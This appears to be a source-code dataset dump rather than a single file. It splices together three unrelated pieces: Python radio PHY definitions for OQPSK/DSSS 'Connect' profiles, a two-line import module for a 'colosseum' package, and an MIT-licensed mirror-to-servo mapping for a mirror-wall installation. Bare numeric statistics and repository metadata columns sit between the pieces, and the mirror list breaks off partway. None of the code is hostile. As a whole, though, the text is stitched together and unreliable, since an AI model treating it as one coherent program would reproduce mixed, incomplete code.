phy.profile_inputs.pll_bandwidth_tx.value = model.vars.pll_bandwidth_tx.var_enum.BW_2520KHz
else:
# Series 2
phy.profile_inputs.pll_bandwidth_tx.value = model.vars.pll_bandwidth_tx.var_enum.BW_2500KHz
phy.profile_inputs.preamble_length.value = 32
phy.profile_inputs.preamble_pattern.value = 0
phy.profile_inputs.preamble_pattern_len.value = 4
phy.profile_inputs.rssi_period.value = 8
phy.profile_inputs.rx_xtal_error_ppm.value = 0
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.NONE
phy.profile_inputs.shaping_filter_param.value = 0.5
phy.profile_inputs.symbol_encoding.value = model.vars.symbol_encoding.var_enum.DSSS
phy.profile_inputs.syncword_0.value = long(167)
phy.profile_inputs.syncword_1.value = long(0)
phy.profile_inputs.syncword_length.value = 8
phy.profile_inputs.timing_detection_threshold.value = 65
phy.profile_inputs.timing_sample_threshold.value = 0
phy.profile_inputs.tx_xtal_error_ppm.value = 0
phy.profile_inputs.white_poly.value = model.vars.white_poly.var_enum.NONE
phy.profile_inputs.xtal_frequency_hz.value = 38400000
return phy
#+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
# def debug_PHY_Connect_IEEE802154_2p4GHz_coh(self, model):
# phy = self._makePhy(model, model.profiles.Base, readable_name='test phy for porting coh demod from ieee to connect', phy_name=phy_name)
#
# # Stuff from connect_base routine.
# phy.profile_inputs.baudrate_tol_ppm.value = 0
# phy.profile_inputs.dsss_chipping_code.value = long(0)
# phy.profile_inputs.dsss_len.value = 0
# phy.profile_inputs.dsss_spreading_factor.value = 0
# phy.profile_inputs.fsk_symbol_map.value = model.vars.fsk_symbol_map.var_enum.MAP0
# #phy.profile_inputs.modulation_type.value = model.vars.modulation_type.var_enum.FSK2
# phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.Gaussian
# phy.profile_inputs.shaping_filter_param.value = 0.5
# phy.profile_inputs.symbol_encoding.value = model.vars.symbol_encoding.var_enum.NRZ
# phy.profile_inputs.xtal_frequency_hz.value = 38400000
# phy.profile_inputs.diff_encoding_mode.value = model.vars.diff_encoding_mode.var_enum.DISABLED
# phy.profile_inputs.crc_byte_endian.value = model.vars.crc_byte_endian.var_enum.MSB_FIRST
# phy.profile_inputs.crc_bit_endian.value = model.vars.crc_bit_endian.var_enum.MSB_FIRST
# phy.profile_inputs.preamble_pattern_len.value = 2
# phy.profile_inputs.preamble_length.value = 32
# phy.profile_inputs.preamble_pattern.value = 1
# phy.profile_inputs.syncword_0.value = long(11732)
# phy.profile_inputs.syncword_1.value = long(0)
# phy.profile_inputs.syncword_length.value = 16
# phy.profile_inputs.white_poly.value = model.vars.white_poly.var_enum.PN9
#
# # Stuff from original Connect phy
# phy.profile_inputs.agc_hysteresis.value = 0
# phy.profile_inputs.agc_power_target.value = -6
# phy.profile_inputs.agc_settling_delay.value = 40
# phy.profile_inputs.base_frequency_hz.value = long(902000000)
# phy.profile_inputs.baudrate_tol_ppm.value = 4000
# phy.profile_inputs.bitrate.value = 100000
# phy.profile_inputs.channel_spacing_hz.value = 2000000
# #phy.profile_inputs.crc_bit_endian.value = model.vars.crc_bit_endian.var_enum.LSB_FIRST
# #phy.profile_inputs.crc_byte_endian.value = model.vars.crc_byte_endian.var_enum.LSB_FIRST
# phy.profile_inputs.deviation.value = 200000
# phy.profile_inputs.diff_encoding_mode.value = model.vars.diff_encoding_mode.var_enum.DISABLED
# phy.profile_inputs.dsss_chipping_code.value = long(1951056795)
# phy.profile_inputs.dsss_len.value = 32
# phy.profile_inputs.dsss_spreading_factor.value = 8
# phy.profile_inputs.fsk_symbol_map.value = model.vars.fsk_symbol_map.var_enum.MAP0
# phy.profile_inputs.manchester_mapping.value = model.vars.manchester_mapping.var_enum.Default
# phy.profile_inputs.modulation_type.value = model.vars.modulation_type.var_enum.OQPSK
# phy.profile_inputs.pll_bandwidth_tx.value = model.vars.pll_bandwidth_tx.var_enum.BW_2520KHz
# phy.profile_inputs.preamble_length.value = 32
# phy.profile_inputs.preamble_pattern.value = 0
# phy.profile_inputs.preamble_pattern_len.value = 4
# phy.profile_inputs.rssi_period.value = 8
# phy.profile_inputs.rx_xtal_error_ppm.value = 0
# phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.NONE
# phy.profile_inputs.shaping_filter_param.value = 0.5
# phy.profile_inputs.symbol_encoding.value = model.vars.symbol_encoding.var_enum.DSSS
# phy.profile_inputs.syncword_0.value = long(167)
# phy.profile_inputs.syncword_1.value = long(0)
# phy.profile_inputs.syncword_length.value = 8
# phy.profile_inputs.timing_detection_threshold.value = 65
# phy.profile_inputs.timing_sample_threshold.value = 0
# phy.profile_inputs.tx_xtal_error_ppm.value = 0
# phy.profile_inputs.white_poly.value = model.vars.white_poly.var_enum.NONE
# phy.profile_inputs.xtal_frequency_hz.value = 38400000
#
# # the rest of the stuff from the ieee phy...
# phy.profile_inputs.agc_power_target.value = -11
# phy.profile_inputs.agc_scheme.value = model.vars.agc_scheme.var_enum.SCHEME_3
# phy.profile_inputs.agc_settling_delay.value = 40
# phy.profile_inputs.bandwidth_hz.value = 2524800
# phy.profile_inputs.baudrate_tol_ppm.value = 0
# phy.profile_inputs.frequency_comp_mode.value = model.vars.frequency_comp_mode.var_enum.DISABLED
# phy.profile_inputs.number_of_timing_windows.value = 7
# phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.Custom_OQPSK
# phy.profile_inputs.symbols_in_timing_window.value = 12
# phy.profile_inputs.timing_detection_threshold.value = 65
#
# phy.profile_outputs.AGC_CTRL2_ADCRSTSTARTUP.override = 0
# phy.profile_outputs.AGC_CTRL2_FASTLOOPDEL.override = 5
# phy.profile_outputs.AGC_GAINSTEPLIM_CFLOOPSTEPMAX.override = 4
# phy.profile_outputs.AGC_GAINSTEPLIM_SLOWDECAYCNT.override = 0
# phy.profile_outputs.AGC_LOOPDEL_IFPGADEL.override = 7
# phy.profile_outputs.AGC_LOOPDEL_LNASLICESDEL.override = 7
# phy.profile_outputs.AGC_LOOPDEL_PKDWAIT.override = 15
# #phy.profile_outputs.AGC_MANGAIN_MANGAINLNAATTEN.override = 0
# phy.profile_outputs.AGC_RSSISTEPTHR_DEMODRESTARTPER.override = 5
# phy.profile_outputs.AGC_RSSISTEPTHR_DEMODRESTARTTHR.override = 0xab
# phy.profile_outputs.AGC_RSSISTEPTHR_POSSTEPTHR.override = 3
# phy.profile_outputs.MODEM_AFC_AFCRXCLR.override = 1
# phy.profile_outputs.MODEM_AFC_AFCSCALEM.override = 3
# phy.profile_outputs.MODEM_AFCADJLIM_AFCADJLIM.override = 2750
# phy.profile_outputs.MODEM_CTRL1_PHASEDEMOD.override = 3
# phy.profile_outputs.MODEM_CTRL2_DATAFILTER.override = 7
# phy.profile_outputs.MODEM_CTRL3_TSAMPDEL.override = 2
# phy.profile_outputs.MODEM_CTRL5_BBSS.override = 5
# phy.profile_outputs.MODEM_CTRL5_FOEPREAVG.override = 7
# phy.profile_outputs.MODEM_CTRL5_LINCORR.override = 1
# phy.profile_outputs.MODEM_CTRL5_POEPER.override = 1
# phy.profile_outputs.MODEM_CTRL6_ARW.override = 1
# phy.profile_outputs.MODEM_CTRL6_PSTIMABORT0.override = 1
# phy.profile_outputs.MODEM_CTRL6_PSTIMABORT1.override = 1
# phy.profile_outputs.MODEM_CTRL6_PSTIMABORT2.override = 1
# phy.profile_outputs.MODEM_CTRL6_RXBRCALCDIS.override = 1
# phy.profile_outputs.MODEM_CTRL6_TDREW.override = 64
# phy.profile_outputs.MODEM_INTAFC_FOEPREAVG0.override = 1
# phy.profile_outputs.MODEM_INTAFC_FOEPREAVG1.override = 3
# phy.profile_outputs.MODEM_INTAFC_FOEPREAVG2.override = 5
# phy.profile_outputs.MODEM_INTAFC_FOEPREAVG3.override = 5
# phy.profile_outputs.MODEM_TIMING_OFFSUBDEN.override = 5
# phy.profile_outputs.MODEM_TIMING_OFFSUBNUM.override = 12
# phy.profile_outputs.MODEM_TIMING_TIMTHRESH.override = 80
# phy.profile_outputs.MODEM_TIMING_TIMSEQSYNC.override = 1
# phy.profile_outputs.MODEM_PRE_TXBASES.override = 7
#
# # Enables Clock gating to reduce current consumption
# phy.profile_outputs.MODEM_CGCLKSTOP_FORCEOFF.override = 0x1E00 # 9,10,11,12
def PHY_Connect_915mhz_oqpsk_2Mcps_250kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='DSSS 250', readable_name="Connect 915MHz OQPSK 2Mcps 250kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.xtal_frequency_hz.value = 38400000
phy.profile_inputs.rx_xtal_error_ppm.value = 0
phy.profile_inputs.tx_xtal_error_ppm.value = 0
phy.profile_inputs.syncword_0.value = long(167)
phy.profile_inputs.syncword_1.value = long(0)
phy.profile_inputs.syncword_tx_skip.value = False
phy.profile_inputs.syncword_length.value = 8
phy.profile_inputs.preamble_pattern_len.value = 4
phy.profile_inputs.preamble_length.value = 32
phy.profile_inputs.preamble_pattern.value = 0
phy.profile_inputs.modulation_type.value = model.vars.modulation_type.var_enum.OQPSK
phy.profile_inputs.deviation.value = 500000
phy.profile_inputs.channel_spacing_hz.value = 2000000
phy.profile_inputs.bitrate.value = 250000
phy.profile_inputs.baudrate_tol_ppm.value = 4000
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.NONE
phy.profile_inputs.base_frequency_hz.value = long(902000000)
phy.profile_inputs.fsk_symbol_map.value = model.vars.fsk_symbol_map.var_enum.MAP0
phy.profile_inputs.diff_encoding_mode.value = model.vars.diff_encoding_mode.var_enum.DISABLED
phy.profile_inputs.shaping_filter_param.value = 0.5
phy.profile_inputs.symbol_encoding.value = model.vars.symbol_encoding.var_enum.DSSS
phy.profile_inputs.manchester_mapping.value = model.vars.manchester_mapping.var_enum.Default
phy.profile_inputs.dsss_chipping_code.value = long(1951056795)
phy.profile_inputs.dsss_len.value = 32
phy.profile_inputs.dsss_spreading_factor.value = 8
phy.profile_inputs.asynchronous_rx_enable.value = False
phy.profile_inputs.crc_byte_endian.value = model.vars.crc_byte_endian.var_enum.LSB_FIRST
phy.profile_inputs.crc_bit_endian.value = model.vars.crc_bit_endian.var_enum.LSB_FIRST
phy.profile_inputs.white_poly.value = model.vars.white_poly.var_enum.NONE
phy.profile_inputs.timing_detection_threshold.value = 65
phy.profile_inputs.timing_sample_threshold.value = 0
if model.part_family.lower() in ['dumbo', 'jumbo', 'nerio', 'nixi']:
# Series 1
phy.profile_inputs.pll_bandwidth_tx.value = model.vars.pll_bandwidth_tx.var_enum.BW_2520KHz
else:
# Series 2
phy.profile_inputs.pll_bandwidth_tx.value = model.vars.pll_bandwidth_tx.var_enum.BW_2500KHz
phy.profile_inputs.agc_power_target.value = -6
phy.profile_inputs.rssi_period.value = 8
phy.profile_inputs.agc_hysteresis.value = 0
phy.profile_inputs.agc_settling_delay.value = 40
return phy
def PHY_Connect_2_4GHz_OQPSK_2Mcps_250kbps(self, model, phy_name=None):
phy = self._makePhy(model, model.profiles.Connect, phy_description='2.4GHz OQPSK 2Mcps 250kbps', readable_name="Connect 2.4GHz OQPSK 2Mcps 250kbps", phy_name=phy_name)
self.Connect_base(phy, model)
phy.profile_inputs.base_frequency_hz.value = long(2405000000)
phy.profile_inputs.agc_hysteresis.value = 0
phy.profile_inputs.agc_power_target.value = -6
phy.profile_inputs.agc_settling_delay.value = 40
phy.profile_inputs.asynchronous_rx_enable.value = False
phy.profile_inputs.baudrate_tol_ppm.value = 4000
phy.profile_inputs.bitrate.value = 250000
phy.profile_inputs.channel_spacing_hz.value = 5000000
phy.profile_inputs.crc_bit_endian.value = model.vars.crc_bit_endian.var_enum.MSB_FIRST
phy.profile_inputs.crc_byte_endian.value = model.vars.crc_byte_endian.var_enum.MSB_FIRST
phy.profile_inputs.deviation.value = 500000
phy.profile_inputs.diff_encoding_mode.value = model.vars.diff_encoding_mode.var_enum.DISABLED
phy.profile_inputs.dsss_chipping_code.value = long(1951056795)
phy.profile_inputs.dsss_len.value = 32
phy.profile_inputs.dsss_spreading_factor.value = 8
phy.profile_inputs.fsk_symbol_map.value = model.vars.fsk_symbol_map.var_enum.MAP0
phy.profile_inputs.manchester_mapping.value = model.vars.manchester_mapping.var_enum.Default
phy.profile_inputs.modulation_type.value = model.vars.modulation_type.var_enum.OQPSK
if model.part_family.lower() in ['dumbo', 'jumbo', 'nerio', 'nixi']:
# Series 1
phy.profile_inputs.pll_bandwidth_tx.value = model.vars.pll_bandwidth_tx.var_enum.BW_2520KHz
else:
# Series 2
phy.profile_inputs.pll_bandwidth_tx.value = model.vars.pll_bandwidth_tx.var_enum.BW_2500KHz
phy.profile_inputs.preamble_length.value = 32
phy.profile_inputs.preamble_pattern.value = 0
phy.profile_inputs.preamble_pattern_len.value = 4
phy.profile_inputs.rssi_period.value = 8
phy.profile_inputs.rx_xtal_error_ppm.value = 0
phy.profile_inputs.shaping_filter.value = model.vars.shaping_filter.var_enum.Custom_OQPSK
phy.profile_inputs.symbol_encoding.value = model.vars.symbol_encoding.var_enum.DSSS
phy.profile_inputs.syncword_0.value = long(229)
phy.profile_inputs.syncword_1.value = long(0)
phy.profile_inputs.syncword_length.value = 8
phy.profile_inputs.timing_detection_threshold.value = 65
phy.profile_inputs.timing_resync_period.value = 2
phy.profile_inputs.timing_sample_threshold.value = 0
phy.profile_inputs.tx_xtal_error_ppm.value = 0
phy.profile_inputs.white_poly.value = model.vars.white_poly.var_enum.NONE
phy.profile_inputs.xtal_frequency_hz.value = 38400000
return phy
| 60.052209
| 175
| 0.741423
| 4,135
| 29,906
| 5.019347
| 0.075937
| 0.173452
| 0.249
| 0.040135
| 0.923826
| 0.894483
| 0.864177
| 0.837726
| 0.813394
| 0.807468
| 0
| 0.045634
| 0.172006
| 29,906
| 497
| 176
| 60.173038
| 0.792545
| 0.233298
| 0
| 0.751534
| 0
| 0
| 0.027939
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.046012
| false
| 0
| 0.009202
| 0
| 0.101227
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7abe7c9b0710d1d6926eba795886e6c41a86598b
| 120
|
py
|
Python
|
colosseum/mdps/custom/__init__.py
|
MichelangeloConserva/Colosseum
|
b0711fd9ce75520deb74cda75c148984a8e4152f
|
[
"MIT"
] | null | null | null |
colosseum/mdps/custom/__init__.py
|
MichelangeloConserva/Colosseum
|
b0711fd9ce75520deb74cda75c148984a8e4152f
|
[
"MIT"
] | null | null | null |
colosseum/mdps/custom/__init__.py
|
MichelangeloConserva/Colosseum
|
b0711fd9ce75520deb74cda75c148984a8e4152f
|
[
"MIT"
] | null | null | null |
from colosseum.mdps.custom.continuous import CustomContinuous
from colosseum.mdps.custom.episodic import CustomEpisodic
| 40
| 61
| 0.883333
| 14
| 120
| 7.571429
| 0.642857
| 0.245283
| 0.320755
| 0.433962
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.066667
| 120
| 2
| 62
| 60
| 0.946429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
8f86b9cdca4c7617d3bfb06d73539d3a507ac2e7
| 16,672
|
py
|
Python
|
mirrormap.py
|
uvoz/mirrorWall
|
8dbcbd5b7f47ec9e7e4f6c61422feb8b8e60479a
|
[
"Unlicense"
] | null | null | null |
mirrormap.py
|
uvoz/mirrorWall
|
8dbcbd5b7f47ec9e7e4f6c61422feb8b8e60479a
|
[
"Unlicense"
] | null | null | null |
mirrormap.py
|
uvoz/mirrorWall
|
8dbcbd5b7f47ec9e7e4f6c61422feb8b8e60479a
|
[
"Unlicense"
] | null | null | null |
# https://prusalab.cz/projekty/reflexe/
## This is the source code to control the REFLEXE mirrorwall.
### Author : Bob Heida
### Test and minor changes : MakerMatty (see commit history)
### MIT License
#Copyright (c) 2019 Bob Heida
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
# ROUTER for mirror messages
# 2019 by StrejcekBob (Bob Heida)
# Testing and minor modifications by MakerMatty
# This file contains the Mirror map that enables us to retrieve the hub, bonnet and the i2cports for a given mirror.
# Mirrormapping serves software & people that wish to operate mirrors based on their logical ID.
# functions exposed:
# getMirrorAddress(mirror)
# returns a complete record for a mirror : e.g. {"mirror":0,"mirror_hub":0,"hub":2,"bonnet":1,"UD-port":0,"LR-port":1}
# Sample code:
# import mirrormap as mm
# address=mm.getMirrorAddress(1)
# print(address['bonnet'])
# getHubNumber(mirror) -returns the hub ID the mirror belongs to: e.g. 2
# Sample code:
# import mirrormap as mm
# print(mm.getHubNumber(2))
# would return 3
# Physical wiring table keyed by hub ("hub1".."hub6").  Each hub's list is
# ordered by mirror_hub (the mirror's position on that hub).  Record fields:
#   mirror     - logical mirror ID used by the rest of the software
#   mirror_hub - index of this mirror within its hub's list
#   hub        - hub number (redundant with the dict key, kept in the record)
#   bonnet     - bonnet on the hub that drives this mirror's two servos
#   UD-port    - port on the bonnet for the up/down axis
#   LR-port    - port on the bonnet for the left/right axis
# NOTE(review): "hub2" has 16 entries (extra mirror 45 on ports 10/11); the
# other hubs have 15 — presumably intentional wiring, verify against hardware.
hubmappings={
    "hub1":[
        {"mirror_hub":0,"mirror":44,"hub":1,"bonnet":0,"UD-port":0,"LR-port":1},
        {"mirror_hub":1,"mirror":43,"hub":1,"bonnet":0,"UD-port":2,"LR-port":3},
        {"mirror_hub":2,"mirror":54,"hub":1,"bonnet":0,"UD-port":6,"LR-port":7},
        {"mirror_hub":3,"mirror":42,"hub":1,"bonnet":0,"UD-port":4,"LR-port":5},
        {"mirror_hub":4,"mirror":53,"hub":1,"bonnet":0,"UD-port":8,"LR-port":9},
        {"mirror_hub":5,"mirror":63,"hub":1,"bonnet":2,"UD-port":4,"LR-port":5},
        {"mirror_hub":6,"mirror":41,"hub":1,"bonnet":1,"UD-port":6,"LR-port":7},
        {"mirror_hub":7,"mirror":52,"hub":1,"bonnet":1,"UD-port":8,"LR-port":9},
        {"mirror_hub":8,"mirror":62,"hub":1,"bonnet":2,"UD-port":8,"LR-port":9},
        {"mirror_hub":9,"mirror":71,"hub":1,"bonnet":2,"UD-port":2,"LR-port":3},
        {"mirror_hub":10,"mirror":40,"hub":1,"bonnet":1,"UD-port":0,"LR-port":1},
        {"mirror_hub":11,"mirror":51,"hub":1,"bonnet":1,"UD-port":2,"LR-port":3},
        {"mirror_hub":12,"mirror":61,"hub":1,"bonnet":1,"UD-port":4,"LR-port":5},
        {"mirror_hub":13,"mirror":70,"hub":1,"bonnet":2,"UD-port":6,"LR-port":7},
        {"mirror_hub":14,"mirror":78,"hub":1,"bonnet":2,"UD-port":0,"LR-port":1}
    ],
    "hub2":[
        {"mirror":34,"mirror_hub":0,"hub":2,"bonnet":0,"UD-port":0,"LR-port":1},
        {"mirror":24,"mirror_hub":1,"hub":2,"bonnet":0,"UD-port":2,"LR-port":3},
        {"mirror":33,"mirror_hub":2,"hub":2,"bonnet":0,"UD-port":6,"LR-port":7},
        {"mirror":15,"mirror_hub":3,"hub":2,"bonnet":0,"UD-port":4,"LR-port":5},
        {"mirror":23,"mirror_hub":4,"hub":2,"bonnet":0,"UD-port":8,"LR-port":9},
        {"mirror":32,"mirror_hub":5,"hub":2,"bonnet":2,"UD-port":4,"LR-port":5},
        {"mirror":7,"mirror_hub":6,"hub":2,"bonnet":1,"UD-port":6,"LR-port":7},
        {"mirror":14,"mirror_hub":7,"hub":2,"bonnet":1,"UD-port":8,"LR-port":9},
        {"mirror":22,"mirror_hub":8,"hub":2,"bonnet":2,"UD-port":8,"LR-port":9},
        {"mirror":31,"mirror_hub":9,"hub":2,"bonnet":2,"UD-port":2,"LR-port":3},
        {"mirror":0,"mirror_hub":10,"hub":2,"bonnet":1,"UD-port":0,"LR-port":1},
        {"mirror":6,"mirror_hub":11,"hub":2,"bonnet":1,"UD-port":2,"LR-port":3},
        {"mirror":13,"mirror_hub":12,"hub":2,"bonnet":1,"UD-port":4,"LR-port":5},
        {"mirror":21,"mirror_hub":13,"hub":2,"bonnet":2,"UD-port":6,"LR-port":7},
        {"mirror":30,"mirror_hub":14,"hub":2,"bonnet":2,"UD-port":0,"LR-port":1},
        {"mirror":45,"mirror_hub":15,"hub":2,"bonnet":0,"UD-port":10,"LR-port":11}
    ],
    "hub3":[
        {"mirror":35,"mirror_hub":0,"hub":3,"bonnet":0,"UD-port":0,"LR-port":1},
        {"mirror":26,"mirror_hub":1,"hub":3,"bonnet":0,"UD-port":2,"LR-port":3},
        {"mirror":25,"mirror_hub":2,"hub":3,"bonnet":0,"UD-port":6,"LR-port":7},
        {"mirror":18,"mirror_hub":3,"hub":3,"bonnet":0,"UD-port":4,"LR-port":5},
        {"mirror":17,"mirror_hub":4,"hub":3,"bonnet":0,"UD-port":8,"LR-port":9},
        {"mirror":16,"mirror_hub":5,"hub":3,"bonnet":2,"UD-port":4,"LR-port":5},
        {"mirror":11,"mirror_hub":6,"hub":3,"bonnet":1,"UD-port":6,"LR-port":7},
        {"mirror":10,"mirror_hub":7,"hub":3,"bonnet":1,"UD-port":8,"LR-port":9},
        {"mirror":9,"mirror_hub":8,"hub":3,"bonnet":2,"UD-port":8,"LR-port":9},
        {"mirror":8,"mirror_hub":9,"hub":3,"bonnet":2,"UD-port":2,"LR-port":3},
        {"mirror":5,"mirror_hub":10,"hub":3,"bonnet":1,"UD-port":0,"LR-port":1},
        {"mirror":4,"mirror_hub":11,"hub":3,"bonnet":1,"UD-port":2,"LR-port":3},
        {"mirror":3,"mirror_hub":12,"hub":3,"bonnet":1,"UD-port":4,"LR-port":5},
        {"mirror":2,"mirror_hub":13,"hub":3,"bonnet":2,"UD-port":6,"LR-port":7},
        {"mirror":1,"mirror_hub":14,"hub":3,"bonnet":2,"UD-port":0,"LR-port":1}
    ],
    "hub4":[
        {"mirror":46,"mirror_hub":0,"hub":4,"bonnet":0,"UD-port":0,"LR-port":1},
        {"mirror":47,"mirror_hub":1,"hub":4,"bonnet":0,"UD-port":2,"LR-port":3},
        {"mirror":36,"mirror_hub":2,"hub":4,"bonnet":0,"UD-port":6,"LR-port":7},
        {"mirror":48,"mirror_hub":3,"hub":4,"bonnet":0,"UD-port":4,"LR-port":5},
        {"mirror":37,"mirror_hub":4,"hub":4,"bonnet":0,"UD-port":8,"LR-port":9},
        {"mirror":27,"mirror_hub":5,"hub":4,"bonnet":2,"UD-port":4,"LR-port":5},
        {"mirror":49,"mirror_hub":6,"hub":4,"bonnet":1,"UD-port":6,"LR-port":7},
        {"mirror":38,"mirror_hub":7,"hub":4,"bonnet":1,"UD-port":8,"LR-port":9},
        {"mirror":28,"mirror_hub":8,"hub":4,"bonnet":2,"UD-port":8,"LR-port":9},
        {"mirror":19,"mirror_hub":9,"hub":4,"bonnet":2,"UD-port":2,"LR-port":3},
        {"mirror":50,"mirror_hub":10,"hub":4,"bonnet":1,"UD-port":0,"LR-port":1},
        {"mirror":39,"mirror_hub":11,"hub":4,"bonnet":1,"UD-port":2,"LR-port":3},
        {"mirror":29,"mirror_hub":12,"hub":4,"bonnet":1,"UD-port":4,"LR-port":5},
        {"mirror":20,"mirror_hub":13,"hub":4,"bonnet":2,"UD-port":6,"LR-port":7},
        {"mirror":12,"mirror_hub":14,"hub":4,"bonnet":2,"UD-port":0,"LR-port":1}
    ],
    "hub5":[
        {"mirror":56,"mirror_hub":0,"hub":5,"bonnet":0,"UD-port":0,"LR-port":1},
        {"mirror":66,"mirror_hub":1,"hub":5,"bonnet":0,"UD-port":2,"LR-port":3},
        {"mirror":57,"mirror_hub":2,"hub":5,"bonnet":0,"UD-port":6,"LR-port":7},
        {"mirror":75,"mirror_hub":3,"hub":5,"bonnet":0,"UD-port":4,"LR-port":5},
        {"mirror":67,"mirror_hub":4,"hub":5,"bonnet":0,"UD-port":8,"LR-port":9},
        {"mirror":58,"mirror_hub":5,"hub":5,"bonnet":2,"UD-port":4,"LR-port":5},
        {"mirror":83,"mirror_hub":6,"hub":5,"bonnet":1,"UD-port":6,"LR-port":7},
        {"mirror":76,"mirror_hub":7,"hub":5,"bonnet":1,"UD-port":8,"LR-port":9},
        {"mirror":68,"mirror_hub":8,"hub":5,"bonnet":2,"UD-port":8,"LR-port":9},
        {"mirror":59,"mirror_hub":9,"hub":5,"bonnet":2,"UD-port":2,"LR-port":3},
        {"mirror":90,"mirror_hub":10,"hub":5,"bonnet":1,"UD-port":0,"LR-port":1},
        {"mirror":84,"mirror_hub":11,"hub":5,"bonnet":1,"UD-port":2,"LR-port":3},
        {"mirror":77,"mirror_hub":12,"hub":5,"bonnet":1,"UD-port":4,"LR-port":5},
        {"mirror":69,"mirror_hub":13,"hub":5,"bonnet":2,"UD-port":6,"LR-port":7},
        {"mirror":60,"mirror_hub":14,"hub":5,"bonnet":2,"UD-port":0,"LR-port":1}
    ],
    "hub6":[
        {"mirror":55,"mirror_hub":0,"hub":6,"bonnet":0,"UD-port":0,"LR-port":1},
        {"mirror":64,"mirror_hub":1,"hub":6,"bonnet":0,"UD-port":2,"LR-port":3},
        {"mirror":65,"mirror_hub":2,"hub":6,"bonnet":0,"UD-port":6,"LR-port":7},
        {"mirror":72,"mirror_hub":3,"hub":6,"bonnet":0,"UD-port":4,"LR-port":5},
        {"mirror":73,"mirror_hub":4,"hub":6,"bonnet":0,"UD-port":8,"LR-port":9},
        {"mirror":74,"mirror_hub":5,"hub":6,"bonnet":2,"UD-port":4,"LR-port":5},
        {"mirror":79,"mirror_hub":6,"hub":6,"bonnet":1,"UD-port":6,"LR-port":7},
        {"mirror":80,"mirror_hub":7,"hub":6,"bonnet":1,"UD-port":8,"LR-port":9},
        {"mirror":81,"mirror_hub":8,"hub":6,"bonnet":2,"UD-port":8,"LR-port":9},
        {"mirror":82,"mirror_hub":9,"hub":6,"bonnet":2,"UD-port":2,"LR-port":3},
        {"mirror":85,"mirror_hub":10,"hub":6,"bonnet":1,"UD-port":0,"LR-port":1},
        {"mirror":86,"mirror_hub":11,"hub":6,"bonnet":1,"UD-port":2,"LR-port":3},
        {"mirror":87,"mirror_hub":12,"hub":6,"bonnet":1,"UD-port":4,"LR-port":5},
        {"mirror":88,"mirror_hub":13,"hub":6,"bonnet":2,"UD-port":6,"LR-port":7},
        {"mirror":89,"mirror_hub":14,"hub":6,"bonnet":2,"UD-port":0,"LR-port":1}
    ]
} #end of mirror_hub mappings
# The same records as above, re-indexed by logical mirror ID so that
# mirrormappings[n] is the record for mirror n (n = 0..90).  The lookup
# functions below index this list directly, so it must stay sorted by
# "mirror" with no gaps.
mirrormappings=[
    {"mirror":0,"mirror_hub":10,"hub":2,"bonnet":1,"UD-port":0,"LR-port":1},
    {"mirror":1,"mirror_hub":14,"hub":3,"bonnet":2,"UD-port":0,"LR-port":1},
    {"mirror":2,"mirror_hub":13,"hub":3,"bonnet":2,"UD-port":6,"LR-port":7},
    {"mirror":3,"mirror_hub":12,"hub":3,"bonnet":1,"UD-port":4,"LR-port":5},
    {"mirror":4,"mirror_hub":11,"hub":3,"bonnet":1,"UD-port":2,"LR-port":3},
    {"mirror":5,"mirror_hub":10,"hub":3,"bonnet":1,"UD-port":0,"LR-port":1},
    {"mirror":6,"mirror_hub":11,"hub":2,"bonnet":1,"UD-port":2,"LR-port":3},
    {"mirror":7,"mirror_hub":6,"hub":2,"bonnet":1,"UD-port":6,"LR-port":7},
    {"mirror":8,"mirror_hub":9,"hub":3,"bonnet":2,"UD-port":2,"LR-port":3},
    {"mirror":9,"mirror_hub":8,"hub":3,"bonnet":2,"UD-port":8,"LR-port":9},
    {"mirror":10,"mirror_hub":7,"hub":3,"bonnet":1,"UD-port":8,"LR-port":9},
    {"mirror":11,"mirror_hub":6,"hub":3,"bonnet":1,"UD-port":6,"LR-port":7},
    {"mirror":12,"mirror_hub":14,"hub":4,"bonnet":2,"UD-port":0,"LR-port":1},
    {"mirror":13,"mirror_hub":12,"hub":2,"bonnet":1,"UD-port":4,"LR-port":5},
